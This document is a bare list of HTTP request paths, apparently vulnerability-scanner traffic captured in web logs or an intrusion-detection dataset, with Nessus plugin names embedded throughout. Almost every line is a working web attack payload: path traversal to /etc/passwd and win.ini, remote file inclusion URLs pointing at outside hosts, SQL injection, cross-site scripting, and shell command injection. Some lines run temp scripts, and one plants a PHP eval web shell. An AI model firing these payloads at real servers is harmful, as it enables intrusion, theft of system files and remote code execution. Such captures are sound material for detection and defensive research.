/static//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/scripts/check-lom.php?etcdir=http://192.168.202.118:8080/zz5thkvtmlgl?
/examples/servlets/servlet/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/index.php?entry='
/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--&blogid=1
/comments.php?scriptpath=http://192.168.202.96:8080/no4ghqiguzhst??
/fmnveedu.jspa?<meta http-equiv=set-cookie content="testgfbr=7014">
/script/template/index.php?main_page_directory=http://192.168.202.96:8080/4dckqcc0acprbz?
<meta http-equiv=set-cookie content="testzgnm=1183">
<meta http-equiv=set-cookie content="testkgqo=204">
/mysubscription/
/examples/servlets/servlet/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
/scripts/buoalakxhatu.cgi
/tuwjta1w.kspx?<meta http-equiv=set-cookie content="testpokn=7494">
/phpmyadmin/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00
/r3le3om5.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/javascript/title.exe
/ju0u7kfo.jspa?<script>cross_site_scripting.nasl</script>
/scripts/t769qwej0llr.php
/hipkz026.php3?<meta http-equiv=set-cookie content="testyrbs=2855">
/default.php?error_message=<script language=javascript>window.alert(document.cookie);</script>
/scripts/nffhikq061nq.php
/top.php?stuff="rm;q48162266&rem;
/ows-bin/.passwd
/6dlc2zm9.asp?<meta http-equiv=set-cookie content="testqpux=4016">
/javascript/.htpasswd.sfish
/javascript/en.exe
/examples/jsp/num/ion-p.exe?page=c:\\winnt\\win.ini
/en-us/account/a1disp3.cgi?/../../../../../../etc/passwd
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+33+c9+51+52+53+ff+75+00+ff+54+05+04+85+c0+7e+01+c3+68+61+64+00+00+68+54+68++>>esbq
/top.php?stuff="ping,-w,7000,-n,1,4.3.2.1|rem,
/1qwv2p5p.php?<meta http-equiv=set-cookie content="testvqcy=252">
/javascript/error-log.exe
/scripts/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd
/javascript/document.bin
/zuihld5m.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/index.php?entry='
/examples/jsp/sessions/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/m2fpztty.php3?<script>cross_site_scripting.nasl</script>
/bmeun223.kspx?<meta http-equiv=set-cookie content="testhhwu=7044">
/main.php?stuff=ping;-w;7000;-n;1;1.2.3.4&rem;
/scripts/htsearch.cgi
/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/scriptcon/
/m2fpztty.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/sql.php?server=000&cfgservers[000][host]=hello&btndrop=no&goto=/etc/passwd
/ao22ww7y.html?<meta http-equiv=set-cookie content="testqppc=8767">
/examples/jsp/jsp2/jspx/backend/classes.php?include_path=../lib/jinzora.js\x00
/d765w06j.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/fastscripts2/
/j4drbkil.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='
/admin/htmlarea/popups/file/files.php?q=<script>alert('wvs-xss-magic-string-414355592517')</script>&mode=apparel
/bl8sefdm.cgi?<script>cross_site_scripting.nasl</script>
/javascript/mlist.exe
/scripts/samples/search/filetime.idq
/hjdzm96v.dll?<script>document.cookie="testbyqe=7474;"</script>
/javascript/index1.exe
/javascript/low.exe
/lsoix5h3.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
/jackrabbit/search.jsp?q=%"<script>alert(1332008604)</script>
/help.php?q="&del,q66241785&rem,
/8t9v8k7x.php?<meta http-equiv=set-cookie content="testhvje=9403">
/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331923197',null,null,null,null --
/cgi-sys/msmmask.exe?mask=/junk334
/fpnpp5zg.fts?<script>document.cookie="testyias=101;"</script>
/phpmyadmin/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00
/9o6g5vkn.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/y8pmygrp.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/<script>document.cookie="testtkio=5454;"</script>
/javascript/fuckoff.exe
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/vir0v3xfc?\x00
/g8nu2yy7.dll?<script>cross_site_scripting.nasl</script>
/javascript/sws.exe
/javascript/console.exe
/nyvbv05h.mscgi?<script>document.cookie="testftxz=5980;"</script>
/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
/javascript/updater.exe
/examples/jsp/num/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00
/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
/manager/wordtrans.php?command=show_desc&advanced=1";id; true "
/flash-xss/
/scripts/index.php?board=nonexistant1452986522
/8x6w469u.asp?<script>document.cookie="testgfjr=1286;"</script>
/examples/jsp/jsp2/el/al_initialize.php?alpath=/etc/passwd\x00
/l13b77e5.kspx?<meta http-equiv=set-cookie content="testjvvf=7721">
/help.php?q="rm q63986192&rem
/script/_conf/core/common-tpl-vars.php?confdir=@rfiurl?confdir=@rfiurl?
/phpmyadmin/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
/main.php?logout="del\x0cq94269861&rem\x0c
/cacti/texis.exe/nessus
/javascript/.htpasswd.sfish/-2147483649
/databasesubscriptionsthumb/
/javascript/hour.exe
/cgibin/fileseek.cgi?foot=&head=;cat /etc/passwd|
/albums/userpics/copperminer.jpg.php?cat /etc/passwd
/en-us/account/include/theme.inc.php?fullpath=/etc/passwd\x00
/ju0u7kfo.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-sys/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/javascript/broker.exe
/examples/jsp/num/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
/examples/jsp/jsp2/el/admin.php?style=../../../../../../../../../../../../etc/passwd\x00
/examples/jsp/jsp2/jspx/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/x7pclv4s.nsf?<meta http-equiv=set-cookie content="testiulz=3709">
/main.php?logout='\x0dsleep\x0910\x09#
/cabela's african safari/
/examples/servlets/servlet/auktion.cgi?menue=../../../../../../../../../etc/passwd
/scripts/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\x00
/nmw0do67.php3?<script>cross_site_scripting.nasl</script>
/scripts/d3z7yywpyeoa.asp
/kernel/loadkernel.php?installpath=/etc/passwd\x00
/v3axg1p8.jspa?<script>document.cookie="testxagh=6987;"</script>
/mod_membre/inscription.php?chemin=http://192.168.202.118:8080/moclyxlwqyfjnp??
/5qnlm5z2.aspx?<meta http-equiv=set-cookie content="testsixi=8451">
/en-us/w4996nr0.mscgi?<script>document.cookie="testttvs=7163;"</script>
/examples/jsp/checkbox/forum_2.php?msg=10&return=<script>foo</script>
/ridin'high/
/?<script>document.cookie="testyrbs=2855;"</script>
/examples/jsp/checkbox/core/editor.php?editor_insert_bottom=/etc/passwd
/help.php?q="&ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0
/help.php?q="|ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09
/search.cgi?qt="<script>alert(412325577727)</script>&search.x=0&search.y=0
/cgi-local/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
/main.php?stuff="ping\x0b-w\x0b9000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332009302&lang_crm=../../vtigerservice.php\x00
/javascript/.htaccess.sfish/\'\"
/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
/o35zot2r.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/mod_membre/inscription.php?chemin=http://cirt.net/rfiinc.txt??
/i2n4v4rl.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/servlets/servlet/index.php?include_files[]=&include_files[query_string]=/etc/passwd
/main.php?stuff="rm\x09q12267523&rem\x09
/examples/jsp/error/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl
/fc9t54l7.cfm?<script>document.cookie="testggad=2000;"</script>
/cacti/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/cgi-bin/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1
/msvcrt.exe/
/scripts/nffhikq061nq.asp
/miz4r5hz.cfc?<meta http-equiv=set-cookie content="testviqu=1270">
/tamambolo_scriptprocdump/
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/top.php%3fstuff%3d2040844887&frm_user=q23487867&scr_height=&scr_width=
/igtf0zon.fts?<script>cross_site_scripting.nasl</script>
/ybz5rz7a.x?<meta http-equiv=set-cookie content="testsbvw=6289">
/javascript/certified.exe
/examples/servlets/servlet/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/scripts/index.php?page=/etc/passwd\x00
/33y9gcqq.htm?<meta http-equiv=set-cookie content="testnvxc=4301">
/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\x00
/scripting guide/
/phpmyadmin/search=<script>alert('xss')</script>
/subscriptions.jsf
/miz4r5hz.x?<script>document.cookie="testviqu=1270;"</script>
/jdx255ea.jspa?<meta http-equiv=set-cookie content="testziyq=5055">
/main.php?logout=1:"ls"
/q703m78q.asp?<meta http-equiv=set-cookie content="testvowq=604">
/cgi-perl/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/scs86g1p.pl?<script>document.cookie="testquyx=2820;"</script>
/u95h6ymu.pl?<meta http-equiv=set-cookie content="testkhwc=4028">
/javascript/cgi-shl.exe
/top.php?stuff='&uname\x09>q47253924\x09#
/3j8echh0.cfc?<script>document.cookie="testfuqi=4189;"</script>
/javascript/exec.exe
/javascript/htpasswd.png
/j734qobz.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/o1zj4u9v.pl?<meta http-equiv=set-cookie content="testabrn=6368">
/cacti/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
/0u75ldxq.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/jspx/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini
/1qwv2p5p.kspx?<script>document.cookie="testvqcy=252;"</script>
/manager/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435
/rpxyx07v.idc?<script>document.cookie="testbnli=1975;"</script>
/cgi-bin/index.php?template=../../../loudblog/custom/config.php\x00
/j2kdmfw4.mscgi?<script>cross_site_scripting.nasl</script>
/help.php?q=;rm q13157688 #
/main.php?stuff="ping,-w,7000,-n,1,4.3.2.1&rem,
/0qhcnefz.fts?<script>cross_site_scripting.nasl</script>
/cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script>
/scripts/index.php?album=../../../../../../../../../../boot.ini\x00
/h4bi26jd.exe?<script>document.cookie="testhrzx=1150;"</script>
/0w155a7c.php?<script>cross_site_scripting.nasl</script>
/main.php?stuff="&del,q13326619&rem,
/fcgi-bin/r.cgi?file=../../../../../../../../../../etc/passwd
//..\..\..\..\..\..\..\..\windows/win.ini
/scriptguide/
/javascript/document.temp
/top.php?stuff='uname\x09>q54162214\x09#
/javascript/big.exe
/d765w06j.do?<script>cross_site_scripting.nasl</script>
/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?
/manager/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--
/recordings/al_initialize.php?alpath=/etc/passwd\x00
/jnv890lt.cgi?<script>cross_site_scripting.nasl</script>
/cgi-914/texis.exe/junk
/main.php?logout='\x0ddel q95689814 #
/\x0a\x0a<script>alert(\"vulnerable\")</script>.jsp
/phpmyadmin/sgdynamo.exe?htname=sgdynamo.exe
/main.php?logout=&ver,>q27276952&rem,
/scripts/includes/db_adodb.php?basedir=/etc/passwd\x00
/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
/script//ident/index.php?path_inc=@rfiurl
/help.php?q="ping -w 9000 -n 1 4.3.2.1&rem
/help.php?q=&uname >q88293785 #
/cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,929714876,0,0,0,0,0--
/top.php?stuff="\x0duname >q44371957 #
/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats340378.txt
/en-us/9kr0ih0v.exe?<meta http-equiv=set-cookie content="testzgnm=1183">
/javascript/htpasswd.html
/u8yiqilu.aspx?<script>document.cookie="testswjp=6010;"</script>
/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/ghl9il?
/addvip.php?msetstr["progsdir"]=http://192.168.202.118:8080/tzhfyzkbomspvm?
/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/top.php?stuff="&ver >q91375949&rem
/scripts/tomcat_proxy_directory_traversal.nasl1332008334
/help.php?q="ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b
/javascript/letters.exe
/javascript/paid.exe
/examples/jsp/checkbox/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00.txt
/recordings/index.php?entry='
/vac1l5vm.do?<script>cross_site_scripting.nasl</script>
/82q7ywa8.aspx?<script>document.cookie="testpwew=1315;"</script>
/ff_noscript/
/help.php?q=";del\x09q65733963\x09#
/javascript/yearly.exe
/javascript/opt.exe
/examples/jsp/sessions/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
/static//..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c/windows/win.ini
/contribute.cgi?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl
/javascript/shtml.exe
/examples/jsp/checkbox/popup.php?include_path=/etc/passwd\x00
/33y9gcqq.fts?<script>document.cookie="testnvxc=4301;"</script>
/javascript/makefile.exe
/6dlc2zm9.dll?<meta http-equiv=set-cookie content="testqpux=4016">
/examples/jsp/error/listrec.pl?app=qmh-news&template=;ls /etc|
/scripts/printenv.pl
/eei78ore.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/jspx/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f
/scripting tools/
/htbin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/9o6g5vkn.html?<script>cross_site_scripting.nasl</script>
/i686v90l.exe?<meta http-equiv=set-cookie content="testfutf=1550">
/examples/jsp/num/home/search.asp?nchannel='1
/scripts/info.dat
/tuwjta1w.htm?<meta http-equiv=set-cookie content="testpokn=7494">
/scripts/ohelp/en_us/content/master/webadmin/webadmin.html
/examples/jsp/cal/check_user_id.php?user_id=<script>foo</script>
/main.php?stuff="ver;>q74579968&rem;
/cgi-home/htimage.exe/path/filename?2,2
/index.php?op=default&date=200607' union select 1,1425852379,1,1,1,1,1,1,1,1--&blogid=1
/it's_cad-tastic!/
/javascript/htpasswd.csv
/j4oqyvga.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/shop/normal_html.cgi?file=|cat /etc/passwd|
/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332010395',null,null,null,null --
/en-us/dda2qr7j.cfm?<script>cross_site_scripting.nasl</script>
/hipkz026.cfm?<meta http-equiv=set-cookie content="testyrbs=2855">
/qb2xy9aw.cfc?<script>cross_site_scripting.nasl</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+fa+>>ctdn
/rbec2ohx.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
/subscriptions.pfx
/en-us/fo564rei.html?<script>cross_site_scripting.nasl</script>
/j4rdyhw8.html?<script>document.cookie="testrluj=1420;"</script>
/bn857frh.dll?<script>cross_site_scripting.nasl</script>
/nyjgaorz.jspa?<script>cross_site_scripting.nasl</script>
/mod_membre/inscription.php?chemin=@rfiurl?chemin=@rfiurl?
/conscripted_gifts/
/cgi-win/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/[seccheck]/..%2f..%2f../ext.ini
/ybz5rz7a.idc?<meta http-equiv=set-cookie content="testsbvw=6289">
/cacti/index.php?act=arcade&do=stats&gameid=1'
/scripts/zq9frlz6fcfp.pl
/scripts/tools/dsnform.exe
/bxnyrhmh.cfm?<meta http-equiv=set-cookie content="testmjct=1867">
/d7ktpmcq.mscgi?<script>cross_site_scripting.nasl</script>
/7u1pb2xi.idc?<meta http-equiv=set-cookie content="testlwwz=718">
/cgi-win/sensepost.exe?/c+dir
/scripts/force-download.php
/admin/common/script.js.php.copy
/scripts/nckowqpd4zng.sh
/javascript/reprints.exe
/forum-ra.asp?n=/etc/passwd
/javascript/track.exe
/recordings/starnet/addons/slideshow_full.php?album_name='1334444193
/m5103snj.idc?<script>cross_site_scripting.nasl</script>
/examples/jsp/cal/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
/javascript/cpadmin.exe
/main.php?logout=';del\x09q16263765\x09#
/scripts/include/theme.inc.php?fullpath=/etc/passwd\x00
/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs' and sleep(4)='
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/&frm_user=&scr_height=&scr_width=q27812776
/cgi-bin/awstatstotals.php?sort="].phpinfo().exit().$a["
/cgi-perl/msmmask.exe?mask=/junk334
/o35zot2r.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
ftp://192.168.23.203/*<apache_mod_proxy_ftp_glob_xss.nasl>
/examples/jsp/error/fxm.exe
/script/param/param.inc.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?
/en-us/<img src="javascript:alert(cross_site_scripting.nasl);">.asp
/scripts/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
/top.php?stuff="&del\x09q45798999&rem\x09
/x7pclv4s.mscgi?<script>document.cookie="testiulz=3709;"</script>
/en-us/i686v90l.x?<script>document.cookie="testfutf=1550;"</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+06+00+00+00+00+00+00+00+00+00+00+00+00+00+00+20+00+00+e0+44+41+54+41+00+00++>>esbq
/phpmyadmin/hw3.cgi?daysonly=0).system('id').(
/help.php?q='\x0auname >q83228487 #
/zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/tzhfyzkbomspvm??
/l13b77e5.cfc?<script>document.cookie="testjvvf=7721;"</script>
/javascript/oa_servlets.exe
/tiasystemdescription/
/zuihld5m.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/newsscript.pl?mode=admin
/main.php?frm_daynight=day&frm_passwd=q75353854&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=&scr_width=
/cgi-bin/cgicso?query=<script>alert('vulnerable')</script>
/ygkjkngd.cgi?<script>document.cookie="testnago=4518;"</script>
/?"><script>alert('struts_sa_surl_xss.nasl')</script>
/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/javascript/.passwd.phtml
/poker tournament - no limit texas hold'em/
/scripts/sc877q2pzqne.cfm
/recordings/sgdynamo.exe?htname=sgdynamo.exe
/order/login.php?svr_rootscript=@rfiurl
/en-us/33y9gcqq.mscgi?<script>document.cookie="testnvxc=4301;"</script>
/nmw0do67.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/www/delivery/ac.php?bannerid=-1331908787+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ti5957ae]));die;/*
/mv8wxfy9.nsf?<meta http-equiv=set-cookie content="testrhbc=8184">
/copatranscript_20061024/
/subscriptions.tar
/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=dzp1jwatlet0voxta
/qczkquis.jsp?<script>document.cookie="testkwlg=5591;"</script>
/examples/jsp/cal/lang/index.php?file=/etc/passwd
/aj3pf49c.php?<meta http-equiv=set-cookie content="testnofv=4170">
/m2fpztty.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/hjdzm96v.cgi?<meta http-equiv=set-cookie content="testbyqe=7474">
/zshscripts/
/cgi/ion-p?page=../../../../../etc/passwd
/zuihld5m.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-bin/smartsearch.cgi?keywords=|/bin/cat /etc/passwd|
/xsqln7eb.jspa?<script>document.cookie="testpcbb=9254;"</script>
/examples/jsp/error/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
/script/fckeditor/editor/dialog/fck_flash.html
/<?php eval($_post['q27992363']);?>
/phpmyadmin//./../../../../../../../.windows/win.ini
/help.php?q=ver\xa0>q95666948&rem\xa0
/examples/jsp/error/ftp/ftp.pl?dir=../../../../../../etc
/javascript/categories.exe
/cgi-binfaq.php?skin=../../admin/manager&tplpath=admin
/cgi-perl/gw5/gwweb.exe?help=bad-request
/examples/jsp/error/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
/main.php?frm_daynight=day&frm_passwd=&frm_referer=q33487769&frm_user=&scr_height=&scr_width=
/cgi-bin/.htpasswd
/dslpwt15.cfm?<script>document.cookie="testtkio=5454;"</script>
/main.php?stuff='\x0asleep\x099\x09#
/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd
/igtf0zon.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
/pam-passwdqc/
//<body><script/src="http://www.example.com/test?rnd=q96295372"></script>
/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/ipb5ri?
/javascript/access-log.1.exe
/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332009307,416096840 --
/?<meta http-equiv=set-cookie content="testbnli=1975">
/0qhcnefz.x?<script>cross_site_scripting.nasl</script>
/um7xpn15.jspa?<script>document.cookie="testotoy=6142;"</script>
/examples/jsp/cal/index.php?cat='
/2004conferencedescription/
/homebet/homebet.dll?form=menu&option=menu-signin
/scripts/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
/manager/forumdisplay.php?fid=21"><script>x</script>
/cgi-914/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
/popularvirusdescriptions/
/u8yiqilu.cfc?<script>document.cookie="testswjp=6010;"</script>
/?<meta http-equiv=set-cookie content="testgjbe=8505">
/javascript/minute.exe
/<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/search.jsp?q=%"<script>alert(1331904374)</script>
/cgi-bin/activeauctionsuperstore/iteminfo.asp?itemid=42'
/opensearchdescription/
ftp://192.168.27.253/*<apache_mod_proxy_ftp_glob_xss.nasl>
/main.php?stuff="&del;q22147997&rem;
/top.php?stuff="ver,>q37582953&rem,
/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/jbqahurnly.sh;echo|awstats912357.txt
/6dlc2zm9.cfc?<script>document.cookie="testqpux=4016;"</script>
/qczkquis.cfm?<script>document.cookie="testkwlg=5591;"</script>
/top.php?stuff="&del\x09q22847462\x09#
/gvx7m5ti.php?<meta http-equiv=set-cookie content="testwldz=3506">
/cgi-914/fileseek2.cgi?foot=;cat /etc/passwd&head=
/help.php?q=";del q49727674 #
/phpmyadmin//\..\..\..\..\..\..\..\..\windows/win.ini
/javascript/promoted.exe
/scripts/hosting/addsubsite.asp
/j734qobz.do?<img src="javascript:alert(cross_site_scripting.nasl);">
<meta http-equiv=set-cookie content="testhvje=9403">
/azcrfs8d.htm?<meta http-equiv=set-cookie content="testjpdr=9205">
/examples/jsp/cal/mlog.html?screen=/etc/passwd
/en-us/9kr0ih0v.idc?<script>document.cookie="testzgnm=1183;"</script>
/rpxyx07v.cfc?<meta http-equiv=set-cookie content="testbnli=1975">
/help.php?q="&rm,q81149724&rem,
/examples/servlets/servletsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
/0u75ldxq.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/netpad.cgi
/top.php?stuff="\x0drm q44371957 #
/zroo33l4.jsp?<script>document.cookie="testiklc=904;"</script>
/javascript/find.exe
/j4rdyhw8.asp?<script>document.cookie="testrluj=1420;"</script>
/zuihld5m.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/manager/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo
/fmnveedu.mscgi?<meta http-equiv=set-cookie content="testgfbr=7014">
/javascript/tape.exe
/top.php?stuff="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09
/examples/jsp/sessions/dsweb/services/user-1"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>
<meta http-equiv=set-cookie content="testmjct=1867">
/javascript/backups.exe
/edition"/
/..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c..\xc1\x9c../winnt/system32/cmd.exe?/c+dir+c:\+/og
/e9rx3ya4.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/manager/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/
/169okeyj.cfc?<meta http-equiv=set-cookie content="testxeoi=3573">
/fnwhrxyd.kspx?<script>cross_site_scripting.nasl</script>
/scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>
//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd
/forum_arc.asp?n=`/etc/passwd`|36|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'`'.
/phpmyadmin/language.php?data_dir=/etc/passwd\x00
/snowboardingxssmallicon/
/showmail.pl?folder=<script>alert(document.cookie)</script>
/aixssh/
/html/partner.php?mainfile=anything&default_theme='<script>alert(document.cookie);</script>
/subscriptions.dump
/cgi-win/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/0w155a7c.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/book review - how to say it when you don't know what to say/
/cgi-bin/simple/view_page?mv_arg=|cat /etc/passwd|
/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/?<script>document.cookie="testvowq=604;"</script>
/fc9t54l7.x?<script>document.cookie="testggad=2000;"</script>
/jnv890lt.htm?<script>cross_site_scripting.nasl</script>
/en-us/account/search.jsp?q=%"<script>alert(1331905049)</script>
/scripts/wd7crx47eaml.shtml
/transcript_tomwelsh050429/
/main.php?stuff="ping,-w,9000,-n,1,4.3.2.1|rem,
/miz4r5hz.fts?<script>document.cookie="testviqu=1270;"</script>
/scripts/rvckwz6smkqf.pl
/uc3w3bdi.x?<script>document.cookie="testxllt=9940;"</script>
/javascript/mobile.exe
/scripts/nmap.php?target=|id
/help.php?q="ver\x0b>q76374652&rem\x0b
/examples/jsp/checkbox/includes/converter.inc.php?include_path=/etc/passwd\x00
/gvx7m5ti.asp?<script>document.cookie="testwldz=3506;"</script>
/en-us/i686v90l.asp?<script>document.cookie="testfutf=1550;"</script>
/en-us/account/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../vtigerservice.php\x00
/javascript/7.exe
/xsqln7eb.php?<meta http-equiv=set-cookie content="testpcbb=9254">
/h5sc3gxy.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/gpasswd/
/webscripts/
/d5a5renl.jsp?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/cal/includes/config.php?relative_script_path=http://xxxxxxx
/scripts/vzdybnanqpc3.cgi
/s7qus4g3.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/jsp2/jspx/index.php?chemin=../../../../../../..//etc
..\\..\\..\\..\\..\\..\\windows\\win.ini
/javascript/.passwd.exe
/scripts/prnnucptkixl.inc
/javascript/jdbc.exe
/examples/jsp/cal/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd
/cgi-win/fileseek2.cgi?foot=&head=;cat /etc/passwd|
/calendar_admin.pl?config=|cat /etc/passwd|
/3j8echh0.jspa?<script>document.cookie="testfuqi=4189;"</script>
/examples/jsp/error/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
/jnt3f86c.jspa?<script>document.cookie="testcmax=9270;"</script>
/top.php?stuff="&ver\x0c>q74447142&rem\x0c
/examples/servlets/servlet/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
/pam-passwdqc_0/
/uc3w3bdi.cfm?<meta http-equiv=set-cookie content="testxllt=9940">
/j4oqyvga.jsp?<script>cross_site_scripting.nasl</script>
/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/mwukuzjaqe.sh+>+/dev/null+&')."]=1
/mrating.exe/
/scripta/
/javascript/import.exe
/scripts/index.php?board=nonexistant522491339
/iv5vkgam.mscgi?<script>document.cookie="testfosd=94;"</script>
